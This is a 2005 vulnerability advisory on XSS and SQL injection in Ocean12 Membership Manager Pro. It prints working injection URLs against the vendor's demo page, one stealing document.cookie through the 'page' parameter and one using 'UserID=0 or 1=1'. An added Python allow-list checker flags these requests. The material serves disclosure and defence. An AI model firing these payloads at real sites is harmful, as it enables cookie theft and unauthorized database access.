Hackers Center Security Group (http://www.hackerscenter.com/)    
Zinho's Security Advisory     


Title: Ocean12 Membership Manager Pro: XSS and SQL injection
Risk: High  
Date: 5/04/2005    
Vendor: http://www.ocean12scripts.com
"A membership manager application designed to allow a website owner to easily add password protected areas to their website"


XSS

http://www.ocean12scripts.com/products/membership/demo/main.asp?UserID=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10

SQL INJECTION
http://www.ocean12scripts.com/products/membership/demo/main.asp?UserID=0 or 1=1&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10
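Added example, not part of the original advisory and not vendor code: an allow-list check for the main.asp query string that can be run over web server logs or placed in front of the application. The parameter shapes are assumptions inferred from the benign values visible in the URLs above (UserID=2, Sort=Name, DisplayNumber=10, with page assumed numeric), and the names EXPECTED and check_request are hypothetical.

```python
import html
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed shapes for each main.asp parameter (not taken from the vendor's code).
EXPECTED = {
    "UserID": re.compile(r"\d{1,10}"),
    "page": re.compile(r"\d{1,6}"),
    "Sort": re.compile(r"[A-Za-z]{1,32}"),
    "DisplayNumber": re.compile(r"\d{1,4}"),
}

def check_request(url):
    """Return (parameter, reason, html_escaped_value) for every violation.

    Values are percent-decoded before matching, so encoded markup is seen
    as markup. The value is HTML-escaped so a report page that prints the
    finding does not reflect the payload itself.
    """
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        pattern = EXPECTED.get(name)
        if pattern is None:
            findings.append((name, "unexpected parameter", html.escape(value)))
        elif not pattern.fullmatch(value):
            findings.append((name, "outside allow-list", html.escape(value)))
    return findings

BASE = "http://www.ocean12scripts.com/products/membership/demo/main.asp?"
MARKUP = "%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cfont%20color=%22"
SAMPLES = [
    # The two requests published in the advisory.
    BASE + "UserID=2&page=" + MARKUP + "&Sort=Name&DisplayNumber=10",
    BASE + "UserID=0 or 1=1&page=" + MARKUP + "&Sort=Name&DisplayNumber=10",
    # Constructed benign request for comparison.
    BASE + "UserID=2&page=1&Sort=Name&DisplayNumber=10",
]

if __name__ == "__main__":
    for url in SAMPLES:
        hits = check_request(url)
        print("REJECT" if hits else "ALLOW ", hits)
```

Rejecting these requests only narrows the input. The application still needs a parameterized query for UserID and HTML encoding wherever page is written back into the response.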


The vendor was contacted more than a month ago. No response has been received.


Author:     
Zinho is webmaster and founder of http://www.hackerscenter.com, a security research portal
Secure Web Hosting Companies Reviewed:  
http://www.securityforge.com/web-hosting/secure-web-hosting.asp  

zinho-no-spam @ hackerscenter.com    


====>
Webmaster of
.:[ Hackers Center : Internet Security Portal]:.
http://www.hackerscenter.com
http://www.securityforge.com/web-hosting
